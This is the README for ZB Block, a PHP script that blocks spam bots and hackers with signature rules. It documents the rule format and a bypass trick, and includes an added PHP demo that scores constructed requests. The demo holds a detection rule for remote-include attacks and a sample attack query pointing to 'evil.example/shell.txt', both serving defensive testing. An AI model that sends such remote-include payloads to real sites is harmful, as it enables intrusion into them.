ZB BLOCK
(Short for Zaphod B. Blocker)
Copyright 2008,2009 by Zaphodb777 under GPL V. 2.0
(Free to use, free to copy, free to modify, free to distribute, just give me credit when you do so!)

REQUIRES: PHP on your server!
BACK UP YOUR SITE/FILES BEFORE TRYING

This script is designed to detect certain behaviors detrimental to websites (MySQL hacks, forum spam,
and much more), or known bad addresses attempting to access your website (more than 100 million
checked). It then sends the bad robot (usually) or hacker to a descriptive 403 after a ~25 second
wait to prevent flooding.

Script and Signature Updates are available at http://www.spambotsecurity.com/zbblock.php

Forum for this software is at http://www.spambotsecurity.com/forum

This script should work without modification on any PHP-equipped webserver; MySQL is not needed.

*** TO INSTALL ***

Load http://www.yoursite.tld/zbblock/setup.php

Follow instructions.

*** TO USE ***

To use, place the line shown at the end of install at the top of (or as near to the top as you can of)
each .php page you wish to protect.

Script WILL NOT WORK with plain html!

The script cannot protect anything that has already been sent or processed before its inclusion (such as
MySQL operations), so place it in the page as high as you can.


*** IF SCRIPT DOES NOT WORK ***
SOME servers report the server's root directory name incorrectly.

If that is the case, change the path in vault/directory.php so that it points at the zbblock
directory. Example:

C:/xAmp/xampp/htdocs/zbblock

*** TO UPDATE SIGNATURES ***

Go to http://www.spambotsecurity.com/zbblock.php
Download the new signature file.
Overwrite the signatures.inc in your /vault/

Simple, no?

*** TO ADD YOUR OWN CUSTOM SIGNATURES ***

FIRST: Please put all custom signatures in customsig.inc in the vault! This system was made so the
main signatures could be left alone and updated without worry.

SECOND: Remember that if you write a bypass, nobody will know what that bypass is (the signatures live
in a locked subdirectory of your site) unless your friend transgresses in some other way and shows up in
the logs. SO, if you make a bypass...
  A. Monitor your logs for your friend fouling up (and exposing the bypass).
  B. Change it often.
  C. As with all things GPL, I don't take any responsibility for this program whatsoever!

THIRD: Remember to make a backup copy of your custom signatures under another filename,
so when the main program is updated you will be able to restore your customs (if still compatible)!

FOURTH: Do not forget to report them at http://zaphodb777.dyndns.org/forum if they prove useful!

 FORMAT IS...
$ax = $ax + ([type of match]([variable to be searched],"[pattern]","[what is the reason for the check]"));

[type of match] can be:
* lmatch:  Check for a match at the left side of the variable only. (Good for Singular IPs)
* rmatch:  Check for a match at the right side of the variable only. (Good for hostnames)
* inmatch: Check for a match anywhere in the variable to be searched.

[variable to be searched] should be one of:
$address     : The IP address of the client.
$hoster      : The hostname of the client.
$loaded      : The file that was loaded on your machine, lowercased.
$pathinfo    : True (1) if pathing of your files was attempted (remote include attack), i.e. the client
               sent a path in the URL; false (0) otherwise.
$query2      : The raw query string of the URL used. (use for case-sensitive matches)
$query       : The lowercased query string of the URL used. (use for case-insensitive matches)
$querydec    : The lowercased and percent-decoded (%## sequences resolved) query string of the URL used.
               (use to catch "cloaked" attack strings)
$requesturi  : The whole of the request URI sent to your webserver.
$rawpost     : The POST data the client sent.
$fromhost    : The referrer.
               (DON'T RELY ON THIS, IT CAN BE CLOAKED, USE AS SUPPLEMENTAL!)
$useragent   : Name/type of the client accessing you.
               (DON'T RELY ON THIS, IT CAN BE CLOAKED, USE AS SUPPLEMENTAL!)
$lcuseragent : Lowercased name/type of the client accessing you.
               (DON'T RELY ON THIS, IT CAN BE CLOAKED, USE AS SUPPLEMENTAL!)


[pattern] : the part of the variable (URL, address, hostname, ...) that is indicative of an attack.

[what is the reason for the check] : an explanation of why this rule blocks when the pattern is found.

* Special IP range match.

$ax = $ax + (iprange($address,"[low ip]","[high ip]","[host/reason]"));

[low ip]  : Classic dotted-quad (www.xxx.yyy.zzz) IP address at the start of the range.
[high ip] : Classic dotted-quad (www.xxx.yyy.zzz) IP address at the end of the range.
[host/reason] : what is blocked by the range, and why.

Removing the comments above the line "// format is..." in the signature file gives a very small speed boost.

Not mentioned in the file itself: you can invert any match for the sake of special exceptions/bypasses
by changing:

$ax = $ax +
to
$ax = $ax -

This is useful for letting a single friend's IP through an IP range block, or whatever.
$ax must be 0 or lower than 0 for a client to be allowed access!
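Here is a worked customsig.inc-style rule set covering the signature format above and the
"$ax = $ax -" bypass trick, run against two constructed requests. This is an added example, not ZB Block's
own code: the lmatch/rmatch/inmatch/iprange helpers are my assumed re-implementations of the semantics
documented above (the real vault/signatures.inc supplies its own), the IP addresses, hostnames and query
strings are made up, and PHP 7.1 or newer is assumed. Only the rule lines follow the documented format.

```php
<?php
// Added example (not ZB Block's own code). The match helpers are ASSUMED
// re-implementations of the documented lmatch/rmatch/inmatch/iprange
// semantics so the rule set can run stand-alone: `php zbsig_demo.php`.
// Requires PHP 7.1+ (nullable return types, short list destructuring).

$zb_hits = [];                       // reasons of every rule that fired

function zb_hit(string $reason): int {
    global $zb_hits;
    $zb_hits[] = $reason;
    return 1;
}

// lmatch: pattern at the LEFT edge of the subject (a prefix test).
function lmatch(string $subject, string $pattern, string $reason): int {
    return ($pattern !== '' && strncmp($subject, $pattern, strlen($pattern)) === 0)
        ? zb_hit($reason) : 0;
}

// rmatch: pattern at the RIGHT edge of the subject (a suffix test).
function rmatch(string $subject, string $pattern, string $reason): int {
    $n = strlen($pattern);
    return ($n > 0 && $n <= strlen($subject) && substr($subject, -$n) === $pattern)
        ? zb_hit($reason) : 0;
}

// inmatch: pattern anywhere in the subject.
function inmatch(string $subject, string $pattern, string $reason): int {
    return ($pattern !== '' && strpos($subject, $pattern) !== false)
        ? zb_hit($reason) : 0;
}

// Dotted-quad IPv4 -> unsigned number; the float keeps it positive on 32-bit PHP.
function ip_to_uint(string $ip): ?float {
    $n = ip2long($ip);
    return $n === false ? null : (float) sprintf('%u', $n);
}

// iprange: inclusive numeric range check on dotted-quad addresses.
function iprange(string $address, string $low, string $high, string $reason): int {
    $a = ip_to_uint($address); $l = ip_to_uint($low); $h = ip_to_uint($high);
    return ($a !== null && $l !== null && $h !== null && $a >= $l && $a <= $h)
        ? zb_hit($reason) : 0;
}

// Runs the rule set against one request and returns [$ax, reasons].
// The request keys mirror the documented variable names.
function zb_evaluate(array $req): array {
    global $zb_hits;
    $zb_hits = [];
    $address     = $req['address'];
    $hoster      = $req['hoster'];
    $query2      = $req['query2'];
    $query       = strtolower($query2);
    $querydec    = strtolower(urldecode($query2));   // catches %-cloaked payloads
    $lcuseragent = strtolower($req['useragent']);

    $ax = 0;
    // Remote-include attempt: a URL scheme smuggled into a query parameter.
    // Note $query would NOT match here: the attacker sent it percent-encoded.
    $ax = $ax + (inmatch($querydec, "=http://", "Remote include attempt (URL in query)"));
    // Block a whole /24 (203.0.113.0/24 is a documentation range, used as a placeholder).
    $ax = $ax + (iprange($address, "203.0.113.0", "203.0.113.255", "203.0.113.0/24 placeholder bad range"));
    // Scraper fingerprint by hostname suffix (made-up hostname).
    $ax = $ax + (rmatch($hoster, ".scraper.example", "Known scraper hostname suffix"));
    // Bypass: let one friend inside the blocked /24 through by SUBTRACTING.
    // iprange with low == high pins exactly one address; lmatch($address,"203.0.113.5")
    // would also match 203.0.113.50 through 203.0.113.59 because it is only a prefix test.
    $ax = $ax - (iprange($address, "203.0.113.5", "203.0.113.5", "Friend bypass 203.0.113.5"));

    return [$ax, $zb_hits];
}

// Constructed requests (not captured traffic).
$attacker = ['address' => '203.0.113.77', 'hoster' => 'h77.scraper.example',
             'query2' => 'page=http%3A%2F%2Fevil.example%2Fshell.txt',
             'useragent' => 'Mozilla/5.0 (compatible; Bad Bot)'];
$friend   = ['address' => '203.0.113.5', 'hoster' => 'home.example.org',
             'query2' => 'page=about', 'useragent' => 'Mozilla/5.0'];

foreach (['attacker' => $attacker, 'friend' => $friend] as $name => $req) {
    [$ax, $why] = zb_evaluate($req);
    $verdict = ($ax > 0) ? "BLOCK (403)" : "allow";   // ax must be 0 or lower to allow
    printf("%-8s ax=%d -> %s  [%s]\n", $name, $ax, $verdict, implode('; ', $why));
}
```

The attacker scores ax=3 (decoded remote-include string, blocked range, scraper hostname) and gets the
403; the friend scores +1 for the range and -1 for the bypass, so ax=0 and they are let through. Two
things to keep in mind when writing your own: the bypass is plain arithmetic, so a request from the
friend's IP needs to trip two other rules (not one) before it is blocked again; and lmatch against
$address is a prefix test, so pin a single address with iprange(low == high) rather than lmatch.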

Keep in mind that the less checking you do (find the commonality in attacks and write one signature for it), the faster this script will finish!

*** END OF DOCS ***
(phew!)

If you have any problems, bugs, suggestions for new inclusions into the blocking signatures, or
ideas for improvement, please come to http://www.spambotsecurity.com/forum/index.php and say so!

Thanks for trying it out, and I hope to hear from you soon!

EOF